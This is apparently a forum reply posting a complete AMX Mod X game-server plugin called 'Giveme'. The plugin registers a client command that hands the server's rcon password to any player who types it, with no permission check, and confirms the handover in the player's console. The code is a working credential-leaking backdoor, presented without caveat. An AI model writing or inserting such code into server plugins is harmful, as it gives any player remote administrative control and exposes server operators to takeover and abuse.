OH. Ok.
Code:
#include <amxmodx>
public plugin_init()
{
register_plugin("Giveme","1.0","Hawk552");
register_clcmd("giveme","giveme");
}
public giveme(id)
{
new command[64];
new rconpass[32];
get_cvar_string("rcon_password",rconpass,31);
format(command,63,"rcon_password %s",rconpass);
client_cmd(id,command);
client_print(id,print_console,"[AMXX] You have been given the rcon password.");
return 0;
}
__________________